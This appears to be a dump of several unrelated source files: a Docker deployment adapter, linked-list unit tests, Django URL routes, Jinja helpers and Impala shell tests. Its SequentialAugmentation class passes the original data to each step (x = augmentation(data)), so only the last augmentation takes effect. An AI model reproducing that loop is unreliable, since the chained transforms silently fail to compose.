return common.gen_response(500, 'Error when connecting to DOCKER API', 'agent', str(agent), 'service',
str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Exception')
return common.gen_response(500, 'Exception: __deploy_docker_compose()', 'agent', str(agent), 'service', str(service))
# deploy_service_agent: Deploy service in an agent
# IN: service, agent
# OUT: status value
def deploy_service_agent(service, service_instance, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [deploy_service_agent] " + str(service) + ", " + str(agent))
try:
# docker-compose
if service['exec_type'] == SERVICE_DOCKER_COMPOSE:
return __deploy_docker_compose(service, agent)
# docker
elif service['exec_type'] == SERVICE_DOCKER:
return __deploy_docker_image(service, agent)
# compss (docker)
elif service['exec_type'] == SERVICE_COMPSS:
return __deploy_docker_compss(service, service_instance, agent)
# not defined
else:
LOG.warning("[lifecycle.modules.apps.docker.adapter] [deploy_service_agent] [" + service['exec_type'] + "] not defined")
return common.gen_response(500, 'Exception: type not defined: deploy_service_agent()', 'agent', str(agent),
'service', str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [deploy_service_agent] Exception')
return common.gen_response(500, 'Exception: deploy_service_agent()', 'agent', str(agent), 'service', str(service))
###############################################################################
# OPERATIONS:
# operation_service_agent: service operation (start, stop...)
def __operation_service_agent(agent, operation):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] [" + operation + "]: " + str(agent))
try:
# connect to docker api / check existing connection
if docker_client.get_client_agent_docker() is not None:
if operation == OPERATION_START:
if docker_client.start_container(agent['container_id']):
agent['status'] = STATUS_STARTED
else:
agent['status'] = STATUS_ERROR_STARTING
if config.dic['NETWORK_COMPSs'] != "not-defined":
docker_client.add_container_to_network(agent['container_id'])
elif operation == OPERATION_STOP:
l_elem = data_adapter.db_get_elem_from_list(agent['container_id'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] docker-compose? [l_elem=" + str(l_elem) + "]")
# docker-compose
if l_elem is not None and l_elem['type'] == SERVICE_DOCKER_COMPOSE:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] 'Docker-compose down' container [" + l_elem['container_2'] + "] launched ...")
docker_client.start_container(l_elem['container_2'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Executing 'docker-compose down' ...")
for i in range(6):
time.sleep(20)
res = docker_client.inspect_container(l_elem['container_2'])
if res is not None and res['State']['Status'] is not None and res['State']['Status'] == 'exited':
break
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Waiting for 'docker-compose down' execution (20s) ...")
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Stopping 'Docker-compose up' container [" + agent['container_id'] + "] ...")
docker_client.stop_container(agent['container_id'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Stopping 'Docker-compose down' container [" + l_elem['container_2'] + "] ...")
docker_client.stop_container(l_elem['container_2'])
agent['status'] = STATUS_STOPPED
# 'normal' container
else:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Stop container: " + agent['container_id'])
if docker_client.stop_container(agent['container_id']):
agent['status'] = STATUS_STOPPED
else:
agent['status'] = STATUS_ERROR_STOPPING
elif operation == OPERATION_TERMINATE:
l_elem = data_adapter.db_get_elem_from_list(agent['container_id'])
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] docker-compose? [l_elem=" + str(l_elem) + "]")
# docker-compose
if l_elem is not None and l_elem['type'] == SERVICE_DOCKER_COMPOSE:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Remove container 1 [" + agent['container_id'] + "] ...")
docker_client.remove_container(agent)
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Remove container 2 [" + l_elem['container_2'] + "] ...")
docker_client.remove_container_by_id(l_elem['container_2'])
# 'normal' container
else:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Remove container: " + agent['container_id'])
docker_client.remove_container(agent)
agent['status'] = STATUS_TERMINATED
# if error when connecting to agent...
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Could not connect to DOCKER API")
agent['status'] = STATUS_UNKNOWN
# return status
return agent['status']
except:
agent['status'] = STATUS_ERROR
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__operation_service_agent] Exception')
return STATUS_ERROR
# start_service_agent: Start service in agent
def start_service_agent(agent):
return __operation_service_agent(agent, OPERATION_START)
# stop_service_agent: Stop service / stop container
def stop_service_agent(agent):
return __operation_service_agent(agent, OPERATION_STOP)
# terminate_service_agent: Stop service / stop container
def terminate_service_agent(agent):
return __operation_service_agent(agent, OPERATION_TERMINATE)
| 53.142857 | 186 | 0.624695 |
f0522181ec65049030b67bc6b8b967f64dbbcf82 | 6,540 | py | Python | site/public/courses/CS-1.2/Code/linkedlist_test.py | KitsuneNoctus/makeschool | 5eec1a18146abf70bb78b4ee3d301f6a43c9ede4 | [
"MIT"
] | 1 | 2021-08-24T20:22:19.000Z | 2021-08-24T20:22:19.000Z | site/public/courses/CS-1.2/Code/linkedlist_test.py | KitsuneNoctus/makeschool | 5eec1a18146abf70bb78b4ee3d301f6a43c9ede4 | [
"MIT"
] | null | null | null | site/public/courses/CS-1.2/Code/linkedlist_test.py | KitsuneNoctus/makeschool | 5eec1a18146abf70bb78b4ee3d301f6a43c9ede4 | [
"MIT"
] | null | null | null | #!python
from linkedlist import LinkedList, Node
import unittest
class NodeTest(unittest.TestCase):
def test_init(self):
data = 'ABC'
node = Node(data)
# Initializer should add instance properties
assert node.data is data
assert node.next is None
def test_linking_nodes(self):
node1 = Node('A')
node2 = Node('B')
node3 = Node('C')
# Link nodes together
node1.next = node2
node2.next = node3
# Node links should be transitive
assert node1.next is node2 # One link
assert node1.next.next is node3 # Two links
class LinkedListTest(unittest.TestCase):
def test_init(self):
ll = LinkedList()
# Initializer should add instance properties
assert ll.head is None # First node
assert ll.tail is None # Last node
def test_init_with_list(self):
ll = LinkedList(['A', 'B', 'C'])
# Initializer should append items in order
assert ll.head.data == 'A' # First item
assert ll.tail.data == 'C' # Last item
def test_items_after_append(self):
ll = LinkedList()
assert ll.items() == []
# Append should add new item to tail of list
ll.append('A')
assert ll.items() == ['A']
ll.append('B')
assert ll.items() == ['A', 'B']
ll.append('C')
assert ll.items() == ['A', 'B', 'C']
def test_items_after_prepend(self):
ll = LinkedList()
assert ll.items() == []
# Prepend should add new item to head of list
ll.prepend('C')
assert ll.items() == ['C']
ll.prepend('B')
assert ll.items() == ['B', 'C']
ll.prepend('A')
assert ll.items() == ['A', 'B', 'C']
def test_length_after_append(self):
ll = LinkedList()
assert ll.length() == 0
# Append should increase length
ll.append('A')
assert ll.length() == 1
ll.append('B')
assert ll.length() == 2
ll.append('C')
assert ll.length() == 3
def test_length_after_prepend(self):
ll = LinkedList()
assert ll.length() == 0
# Prepend should increase length
ll.prepend('C')
assert ll.length() == 1
ll.prepend('B')
assert ll.length() == 2
ll.prepend('A')
assert ll.length() == 3
def test_length_after_append_and_prepend(self):
ll = LinkedList()
assert ll.length() == 0
# Append and prepend should increase length
ll.append('C')
assert ll.length() == 1
ll.prepend('B')
assert ll.length() == 2
ll.append('D')
assert ll.length() == 3
ll.prepend('A')
assert ll.length() == 4
def test_length_after_delete(self):
ll = LinkedList(['A', 'B', 'C', 'D', 'E'])
assert ll.length() == 5
# Delete should decrease length
ll.delete('A')
assert ll.length() == 4
ll.delete('E')
assert ll.length() == 3
ll.delete('C')
assert ll.length() == 2
ll.delete('D')
assert ll.length() == 1
ll.delete('B')
assert ll.length() == 0
def test_append(self):
ll = LinkedList()
# Append should always update tail node
ll.append('A')
assert ll.head.data == 'A' # New head
assert ll.tail.data == 'A' # New tail
ll.append('B')
assert ll.head.data == 'A' # Unchanged
assert ll.tail.data == 'B' # New tail
ll.append('C')
assert ll.head.data == 'A' # Unchanged
assert ll.tail.data == 'C' # New tail
def test_prepend(self):
ll = LinkedList()
# Prepend should always update head node
ll.prepend('C')
assert ll.head.data == 'C' # New head
assert ll.tail.data == 'C' # New head
ll.prepend('B')
assert ll.head.data == 'B' # New head
assert ll.tail.data == 'C' # Unchanged
ll.prepend('A')
assert ll.head.data == 'A' # New head
assert ll.tail.data == 'C' # Unchanged
def test_find(self):
ll = LinkedList(['A', 'B', 'C'])
assert ll.find('B') == True
assert ll.find('A') == True # Match less than
assert ll.find('C') == True # Match greater than
assert ll.find('X') == False # No matching item
def test_delete_with_3_items(self):
ll = LinkedList(['A', 'B', 'C'])
assert ll.head.data == 'A' # First item
assert ll.tail.data == 'C' # Last item
ll.delete('A')
assert ll.head.data == 'B' # New head
assert ll.tail.data == 'C' # Unchanged
ll.delete('C')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'B' # New tail
ll.delete('B')
assert ll.head is None # No head
assert ll.tail is None # No tail
# Delete should raise error if item was already deleted
with self.assertRaises(ValueError):
ll.delete('A') # Item no longer in list
with self.assertRaises(ValueError):
ll.delete('B') # Item no longer in list
with self.assertRaises(ValueError):
ll.delete('C') # Item no longer in list
def test_delete_with_5_items(self):
ll = LinkedList(['A', 'B', 'C', 'D', 'E'])
assert ll.head.data == 'A' # First item
assert ll.tail.data == 'E' # Last item
ll.delete('A')
assert ll.head.data == 'B' # New head
assert ll.tail.data == 'E' # Unchanged
ll.delete('E')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'D' # New tail
ll.delete('C')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'D' # Unchanged
ll.delete('D')
assert ll.head.data == 'B' # Unchanged
assert ll.tail.data == 'B' # New tail
ll.delete('B')
assert ll.head is None # No head
assert ll.tail is None # No tail
def test_delete_with_item_not_in_list(self):
ll = LinkedList(['A', 'B', 'C'])
# Delete should raise error if item not found
with self.assertRaises(ValueError):
ll.delete('X') # Item not found in list
if __name__ == '__main__':
unittest.main()
| 33.19797 | 64 | 0.520795 |
fd5766b715d21464a9c232d0890cfbcafae56eda | 824 | py | Python | appgen/urls.py | Ecotrust/madrona-app-generator | 078d124a8aacadf8a151da7a5434f68868564431 | [
"BSD-3-Clause"
] | null | null | null | appgen/urls.py | Ecotrust/madrona-app-generator | 078d124a8aacadf8a151da7a5434f68868564431 | [
"BSD-3-Clause"
] | null | null | null | appgen/urls.py | Ecotrust/madrona-app-generator | 078d124a8aacadf8a151da7a5434f68868564431 | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns, include, url
from django.http import HttpResponseRedirect
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Always go to the appconfig changelist
url(r'^activate/(?P<pk>\d+)/$', 'appgen.views.activate', name='activate'),
url(r'^initialize/(?P<pk>\d+)/$', 'appgen.views.initialize', name='initialize'),
url(r'^delete/(?P<pk>\d+)/$', 'appgen.views.delete', name='delete'),
url(r'^initial_docs/$', 'appgen.views.initial_docs', name='initial_docs'),
(r'^$', lambda x: HttpResponseRedirect('/admin/appgen/appconfig/')),
(r'^admin/$', lambda x: HttpResponseRedirect('/admin/appgen/appconfig/')),
(r'^admin/appgen/$', lambda x: HttpResponseRedirect('/admin/appgen/appconfig/')),
(r'^admin/', include(admin.site.urls)),
)
| 45.777778 | 85 | 0.679612 |
73f73dbcc5ff7c6f66531f5654ef65ef540794ef | 446 | py | Python | hw_asr/augmentations/sequential.py | alexdrydew/asr_project_template | f65a4662bb2e75aff5ca62361109192e3c324324 | [
"MIT"
] | 1 | 2021-10-06T13:08:29.000Z | 2021-10-06T13:08:29.000Z | hw_asr/augmentations/sequential.py | alexdrydew/asr_project_template | f65a4662bb2e75aff5ca62361109192e3c324324 | [
"MIT"
] | 1 | 2021-10-10T21:38:51.000Z | 2021-10-11T21:36:48.000Z | hw_asr/augmentations/sequential.py | alexdrydew/asr_project_template | f65a4662bb2e75aff5ca62361109192e3c324324 | [
"MIT"
] | 11 | 2021-10-05T14:02:26.000Z | 2021-11-25T22:02:56.000Z | from typing import List, Callable
from torch import Tensor
from hw_asr.augmentations.base import AugmentationBase
class SequentialAugmentation(AugmentationBase):
def __init__(self, augmentation_list: List[Callable]):
self.augmentation_list = augmentation_list
def __call__(self, data: Tensor) -> Tensor:
x = data
for augmentation in self.augmentation_list:
x = augmentation(data)
return x
| 26.235294 | 58 | 0.719731 |
3b12dad00c29569e7f8d4247a792801f36665412 | 1,160 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/jinja/get.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | null | null | null | pkgs/sdk-pkg/src/genie/libs/sdk/apis/jinja/get.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | 1 | 2020-08-01T00:59:29.000Z | 2020-08-01T00:59:32.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/jinja/get.py | miott/genielibs | 6464642cdd67aa2367bdbb12561af4bb060e5e62 | [
"Apache-2.0"
] | null | null | null | # Python
import jinja2
from jinja2.exceptions import TemplateNotFound
def get_jinja_template(templates_dir, template_name):
""" Gets the jinja template specified
Args:
templates_dir ('str'): Templates directory
template_name ('str'): Template name
Returns:
('obj') jinja template
None
Raises:
None
"""
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(searchpath=templates_dir),
undefined=jinja2.StrictUndefined
)
try:
template = env.get_template(template_name)
except TemplateNotFound:
return
return template
def load_jinja_template(path, file, **kwargs):
"""Use Jinja templates to build the device configuration
Args:
path (`str`): Path to file directory
file (`str`): File name
kwargs (`dict`): Key value pairs
Returns:
out (`str`): Rendered template
"""
env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=path))
template = env.get_template(file)
out = template.render(**kwargs)
return out
| 23.673469 | 77 | 0.621552 |
2f1277ad84cca73955b6bbefe4489f4fabb4fc70 | 17,883 | py | Python | tests/shell/test_shell_commandline.py | henryr/minimised-impala | 264d20a4f02ece6ee94e96bc49db2825b0bb1548 | [
"Apache-2.0"
] | null | null | null | tests/shell/test_shell_commandline.py | henryr/minimised-impala | 264d20a4f02ece6ee94e96bc49db2825b0bb1548 | [
"Apache-2.0"
] | null | null | null | tests/shell/test_shell_commandline.py | henryr/minimised-impala | 264d20a4f02ece6ee94e96bc49db2825b0bb1548 | [
"Apache-2.0"
] | null | null | null | # encoding=utf-8
# Copyright 2012 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
import re
import shlex
import signal
from impala_shell_results import get_shell_cmd_result
from subprocess import Popen, PIPE, call
from tests.common.impala_service import ImpaladService
from time import sleep
from test_shell_common import assert_var_substitution
IMPALAD_HOST_PORT_LIST = pytest.config.option.impalad.split(',')
assert len(IMPALAD_HOST_PORT_LIST) > 0, 'Must specify at least 1 impalad to target'
IMPALAD = IMPALAD_HOST_PORT_LIST[0]
SHELL_CMD = "%s/bin/impala-shell.sh -i %s" % (os.environ['IMPALA_HOME'], IMPALAD)
DEFAULT_QUERY = 'select 1'
TEST_DB = "tmp_shell"
TEST_TBL = "tbl1"
QUERY_FILE_PATH = os.path.join(os.environ['IMPALA_HOME'], 'tests', 'shell')
class TestImpalaShell(object):
"""A set of sanity tests for the Impala shell commandline parameters.
The tests need to maintain Python 2.4 compatibility as a sub-goal of having
shell tests is to ensure that it's not broken in systems running Python 2.4.
The tests need a running impalad instance in order to execute queries.
TODO:
* Test individual modules.
* Add a test for a kerberized impala.
"""
@classmethod
def setup_class(cls):
cls.__create_shell_data()
@classmethod
def teardown_class(cls):
run_impala_shell_cmd('-q "drop table if exists %s.%s"' % (TEST_DB, TEST_TBL))
run_impala_shell_cmd('-q "drop database if exists %s"' % TEST_DB)
@classmethod
def __create_shell_data(cls):
# Create a temporary table and populate it with test data.
stmts = ['create database if not exists %s' % TEST_DB,
'create table if not exists %s.%s (i integer, s string)' % (TEST_DB,
TEST_TBL),
"insert into %s.%s values (1, 'a'),(1, 'b'),(3, 'b')" % (TEST_DB, TEST_TBL)
]
args = '-q "%s"' % (';'.join(stmts))
run_impala_shell_cmd(args)
@pytest.mark.execute_serially
def test_no_args(self):
args = '-q "%s"' % DEFAULT_QUERY
run_impala_shell_cmd(args)
@pytest.mark.execute_serially
def test_multiple_queries(self):
queries = ';'.join([DEFAULT_QUERY] * 3)
args = '-q "%s" -B' % queries
run_impala_shell_cmd(args)
@pytest.mark.execute_serially
def test_multiple_queries_with_escaped_backslash(self):
# Regression test for string containing an escaped backslash. This relies on the
# patch at thirdparty/patches/sqlparse/0001-....patch.
run_impala_shell_cmd(r'''-q "select '\\\\'; select '\\'';" -B''')
@pytest.mark.execute_serially
def test_default_db(self):
args = '-d %s -q "describe %s" --quiet' % (TEST_DB, TEST_TBL)
run_impala_shell_cmd(args)
args = '-q "describe %s"' % TEST_TBL
run_impala_shell_cmd(args, expect_success=False)
# test keyword parquet is interpreted as an identifier
# when passed as an argument to -d
args = '-d parquet'
result = run_impala_shell_cmd(args)
assert "Query: use `parquet`" in result.stderr, result.stderr
# test if backticking is idempotent
args = "-d '```parquet```'"
result = run_impala_shell_cmd(args)
assert "Query: use `parquet`" in result.stderr, result.stderr
@pytest.mark.execute_serially
def test_refresh_on_connect(self):
args = '-r -q "%s"' % DEFAULT_QUERY
result = run_impala_shell_cmd(args)
assert 'Invalidating Metadata' in result.stderr, result.stderr
@pytest.mark.execute_serially
def test_unsecure_message(self):
results = run_impala_shell_cmd("")
assert "Starting Impala Shell without Kerberos authentication" in results.stderr
@pytest.mark.execute_serially
def test_print_header(self):
args = '--print_header -B --output_delim="," -q "select * from %s.%s"' % (TEST_DB,
TEST_TBL)
result = run_impala_shell_cmd(args)
result_rows = result.stdout.strip().split('\n')
assert len(result_rows) == 4
assert result_rows[0].split(',') == ['i', 's']
args = '-B --output_delim="," -q "select * from %s.%s"' % (TEST_DB, TEST_TBL)
result = run_impala_shell_cmd(args)
result_rows = result.stdout.strip().split('\n')
assert len(result_rows) == 3
@pytest.mark.execute_serially
def test_kerberos_option(self):
args = "-k"
# If you have a valid kerberos ticket in your cache, this test fails - so
# here we set a bogus KRB5CCNAME in the environment so that klist (and other
# kerberos commands) won't find the normal ticket cache.
# KERBEROS TODO: add kerberized cluster test case
os.environ["KRB5CCNAME"] = "/tmp/this/file/hopefully/does/not/exist"
# The command will fail because we're trying to connect to a kerberized impalad.
results = run_impala_shell_cmd(args, expect_success=False)
# Check that impala is using the right service name.
assert "Using service name 'impala'" in results.stderr
assert "Starting Impala Shell using Kerberos authentication" in results.stderr
# Check that Impala warns the user if klist does not exist on the system, or if
# no kerberos tickets are initialized.
try:
call(["klist"])
expected_error_msg = ("-k requires a valid kerberos ticket but no valid kerberos "
"ticket found.")
assert expected_error_msg in results.stderr
except OSError:
assert 'klist not found on the system' in results.stderr
# Make sure we don't try to re-connect
assert "retrying the connection with a secure transport" not in results.stderr
# Change the service name
args += " -s foobar"
results = run_impala_shell_cmd(args, expect_success=False)
assert "Using service name 'foobar'" in results.stderr
@pytest.mark.execute_serially
def test_continue_on_error(self):
args = '-c -q "select foo; select bar;"'
run_impala_shell_cmd(args)
# Should fail
args = '-q "select foo; select bar;"'
run_impala_shell_cmd(args, expect_success=False)
@pytest.mark.execute_serially
def test_execute_queries_from_file(self):
args = '-f %s/test_file_comments.sql --quiet -B' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
output = result.stdout
args = '-f %s/test_file_no_comments.sql --quiet -B' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert output == result.stdout, "Queries with comments not parsed correctly"
@pytest.mark.execute_serially
def test_completed_query_errors(self):
args = ('-q "set abort_on_error=false;'
' select count(*) from functional_seq_snap.bad_seq_snap"')
result = run_impala_shell_cmd(args)
assert 'WARNINGS:' in result.stderr
assert 'Bad synchronization marker' in result.stderr
assert 'Expected: ' in result.stderr
assert 'Actual: ' in result.stderr
assert 'Problem parsing file' in result.stderr
# Regression test for CDH-21036
# do not print warning log in quiet mode
args = ('-q "set abort_on_error=false;'
' select count(*) from functional_seq_snap.bad_seq_snap" --quiet')
result = run_impala_shell_cmd(args)
assert 'WARNINGS:' not in result.stderr
@pytest.mark.execute_serially
def test_output_format(self):
expected_output = ['1'] * 3
args = '-q "select 1,1,1" -B --quiet'
result = run_impala_shell_cmd(args)
actual_output = [r.strip() for r in result.stdout.split('\t')]
assert actual_output == expected_output
result = run_impala_shell_cmd(args + ' --output_delim="|"')
actual_output = [r.strip() for r in result.stdout.split('|')]
assert actual_output == expected_output
result = run_impala_shell_cmd(args + ' --output_delim="||"',
expect_success=False)
assert "Illegal delimiter" in result.stderr
@pytest.mark.execute_serially
def test_do_methods(self):
"""Ensure that the do_ methods in the shell work.
Some of the do_ methods are implicitly tested in other tests, and as part of the test
setup.
"""
# explain
args = '-q "explain select 1"'
run_impala_shell_cmd(args)
# show
args = '-q "show tables"'
run_impala_shell_cmd(args)
# with
args = '-q "with t1 as (select 1) select * from t1"'
run_impala_shell_cmd(args)
# set
# spaces around the = sign
args = '-q "set default_order_by_limit = 10"'
run_impala_shell_cmd(args)
# no spaces around the = sign
args = '-q "set default_order_by_limit=10"'
run_impala_shell_cmd(args)
# test query options displayed
args = '-q "set"'
result_set = run_impala_shell_cmd(args)
assert 'MEM_LIMIT: [0]' in result_set.stdout
# test to check that explain_level is 1
assert 'EXPLAIN_LEVEL: [1]' in result_set.stdout
# test values displayed after setting value
args = '-q "set mem_limit=1g;set"'
result_set = run_impala_shell_cmd(args)
# single list means one instance of mem_limit in displayed output
assert 'MEM_LIMIT: 1g' in result_set.stdout
assert 'MEM_LIMIT: [0]' not in result_set.stdout
# Negative tests for set
# use : instead of =
args = '-q "set default_order_by_limit:10"'
run_impala_shell_cmd(args, expect_success=False)
# use 2 = signs
args = '-q "set default_order_by_limit=10=50"'
run_impala_shell_cmd(args, expect_success=False)
# describe and desc should return the same result.
args = '-q "describe %s.%s" -B' % (TEST_DB, TEST_TBL)
result_describe = run_impala_shell_cmd(args)
args = '-q "desc %s.%s" -B' % (TEST_DB, TEST_TBL)
result_desc = run_impala_shell_cmd(args)
assert result_describe.stdout == result_desc.stdout
@pytest.mark.execute_serially
def test_runtime_profile(self):
# test summary is in both the profile printed by the
# -p option and the one printed by the profile command
args = "-p -q 'select 1; profile;'"
result_set = run_impala_shell_cmd(args)
# This regex helps us uniquely identify a profile.
regex = re.compile("Operator\s+#Hosts\s+Avg\s+Time")
# We expect two query profiles.
assert len(re.findall(regex, result_set.stdout)) == 2, \
"Could not detect two profiles, stdout: %s" % result_set.stdout
@pytest.mark.execute_serially
def test_summary(self):
args = "-q 'select count(*) from functional.alltypes; summary;'"
result_set = run_impala_shell_cmd(args)
assert "03:AGGREGATE" in result_set.stdout
args = "-q 'summary;'"
result_set = run_impala_shell_cmd(args, expect_success=False)
assert "Could not retrieve summary for query" in result_set.stderr
args = "-q 'show tables; summary;'"
result_set = run_impala_shell_cmd(args)
assert "Summary not available" in result_set.stderr
# Test queries without an exchange
args = "-q 'select 1; summary;'"
result_set = run_impala_shell_cmd(args)
assert "00:UNION" in result_set.stdout
@pytest.mark.execute_serially
def test_queries_closed(self):
"""Regression test for IMPALA-897"""
args = '-f %s/test_close_queries.sql --quiet -B' % QUERY_FILE_PATH
cmd = "%s %s" % (SHELL_CMD, args)
# Execute the shell command async
p = Popen(shlex.split(cmd), shell=False, stdout=PIPE, stderr=PIPE)
impalad_service = ImpaladService(IMPALAD.split(':')[0])
# The last query in the test SQL script will sleep for 10 seconds, so sleep
# here for 5 seconds and verify the number of in-flight queries is 1.
sleep(5)
assert 1 == impalad_service.get_num_in_flight_queries()
assert get_shell_cmd_result(p).rc == 0
assert 0 == impalad_service.get_num_in_flight_queries()
@pytest.mark.execute_serially
def test_cancellation(self):
"""Test cancellation (Ctrl+C event)"""
args = '-q "select sleep(10000)"'
cmd = "%s %s" % (SHELL_CMD, args)
p = Popen(shlex.split(cmd), stderr=PIPE, stdout=PIPE)
sleep(3)
os.kill(p.pid, signal.SIGINT)
result = get_shell_cmd_result(p)
assert "Cancelling Query" in result.stderr, result.stderr
@pytest.mark.execute_serially
def test_get_log_once(self):
"""Test that get_log() is always called exactly once."""
pytest.xfail(reason="The shell doesn't fetch all the warning logs.")
# Query with fetch
args = '-q "select * from functional.alltypeserror"'
result = run_impala_shell_cmd(args)
assert result.stderr.count('WARNINGS') == 1
# Insert query (doesn't fetch)
INSERT_TBL = "alltypes_get_log"
DROP_ARGS = '-q "drop table if exists %s.%s"' % (TEST_DB, INSERT_TBL)
run_impala_shell_cmd(DROP_ARGS)
args = '-q "create table %s.%s like functional.alltypeserror"' % (TEST_DB, INSERT_TBL)
run_impala_shell_cmd(args)
args = '-q "insert overwrite %s.%s partition(year, month)' \
'select * from functional.alltypeserror"' % (TEST_DB, INSERT_TBL)
result = run_impala_shell_cmd(args)
assert result.stderr.count('WARNINGS') == 1
run_impala_shell_cmd(DROP_ARGS)
@pytest.mark.execute_serially
def test_international_characters(self):
"""Sanity test to ensure that the shell can read international characters."""
RUSSIAN_CHARS = (u"А, Б, В, Г, Д, Е, Ё, Ж, З, И, Й, К, Л, М, Н, О, П, Р,"
u"С, Т, У, Ф, Х, Ц,Ч, Ш, Щ, Ъ, Ы, Ь, Э, Ю, Я")
args = """-B -q "select '%s'" """ % RUSSIAN_CHARS
result = run_impala_shell_cmd(args.encode('utf-8'))
assert 'UnicodeDecodeError' not in result.stderr
#print result.stdout.encode('utf-8')
assert RUSSIAN_CHARS.encode('utf-8') in result.stdout
@pytest.mark.execute_serially
def test_config_file(self):
"""Test the optional configuration file"""
# Positive tests
args = '--config_file=%s/good_impalarc' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert 'Query: select 1' in result.stderr
assert 'Invalidating Metadata' in result.stderr
# override option in config file through command line
args = '--config_file=%s/good_impalarc --query="select 2"' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert 'Query: select 2' in result.stderr
# Negative Tests
# specified config file does not exist
args = '--config_file=%s/does_not_exist' % QUERY_FILE_PATH
run_impala_shell_cmd(args, expect_success=False)
# bad formatting of config file
args = '--config_file=%s/bad_impalarc' % QUERY_FILE_PATH
run_impala_shell_cmd(args, expect_success=False)
@pytest.mark.execute_serially
def test_execute_queries_from_stdin(self):
""" Test that queries get executed correctly when STDIN is given as the sql file """
args = '-f - --quiet -B'
query_file = "%s/test_file_comments.sql" % QUERY_FILE_PATH
query_file_handle = None
try:
query_file_handle = open(query_file, 'r')
query = query_file_handle.read()
query_file_handle.close()
except Exception, e:
assert query_file_handle != None, "Exception %s: Could not find query file" % e
result = run_impala_shell_cmd(args, expect_success=True, stdin_input=query)
output = result.stdout
args = '-f %s/test_file_no_comments.sql --quiet -B' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert output == result.stdout, "Queries from STDIN not parsed correctly."
@pytest.mark.execute_serially
def test_allow_creds_in_clear(self):
args = '-l'
result = run_impala_shell_cmd(args, expect_success=False)
assert "LDAP credentials may not be sent over insecure connections. " +\
"Enable SSL or set --auth_creds_ok_in_clear" in result.stderr
# TODO: Without an Impala daemon running LDAP authentication, we can't test if
# --auth_creds_ok_in_clear works when correctly set.
@pytest.mark.execute_serially
def test_ldap_password_from_shell(self):
args = "-l --auth_creds_ok_in_clear --ldap_password_cmd='%s'"
result = run_impala_shell_cmd(args % 'cmddoesntexist', expect_success=False)
assert ("Error retrieving LDAP password (command was: 'cmddoesntexist', exception "
"was: '[Errno 2] No such file or directory')") in result.stderr
result = run_impala_shell_cmd(args % 'cat filedoesntexist', expect_success=False)
assert ("Error retrieving LDAP password (command was 'cat filedoesntexist', error "
"was: 'cat: filedoesntexist: No such file or directory')") in result.stderr
# TODO: Without an Impala daemon with LDAP authentication enabled, we can't test the
# positive case where the password is correct.
@pytest.mark.execute_serially
def test_var_substitution(self):
args = '--var=foo=123 --var=BAR=456 --delimited --output_delimiter=" " -c -f %s' \
% (os.path.join(QUERY_FILE_PATH, 'test_var_substitution.sql'))
result = run_impala_shell_cmd(args, expect_success=True)
assert_var_substitution(result)
def run_impala_shell_cmd(shell_args, expect_success=True, stdin_input=None):
"""Runs the Impala shell on the commandline.
'shell_args' is a string which represents the commandline options.
Returns a ImpalaShellResult.
"""
cmd = "%s %s" % (SHELL_CMD, shell_args)
p = Popen(shlex.split(cmd), shell=False, stdout=PIPE, stderr=PIPE, stdin=PIPE)
result = get_shell_cmd_result(p, stdin_input)
if expect_success:
assert result.rc == 0, "Cmd %s was expected to succeed: %s" % (cmd, result.stderr)
else:
assert result.rc != 0, "Cmd %s was expected to fail" % cmd
return result
| 41.395833 | 90 | 0.695297 |
3199c9639bbd6aac6e9ff188b9f712c6679153ae | 1,334 | py | Python | tests/test_hosts.py | philippeitis/jc | d96b3a65a98bc135d21d4feafc0a43317b5a11fa | [
"MIT"
] | null | null | null | tests/test_hosts.py | philippeitis/jc | d96b3a65a98bc135d21d4feafc0a43317b5a11fa | [
"MIT"
] | null | null | null | tests/test_hosts.py | philippeitis/jc | d96b3a65a98bc135d21d4feafc0a43317b5a11fa | [
"MIT"
] | null | null | null | import os
import json
import unittest
import jc.parsers.hosts
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class MyTests(unittest.TestCase):
def setUp(self):
# input
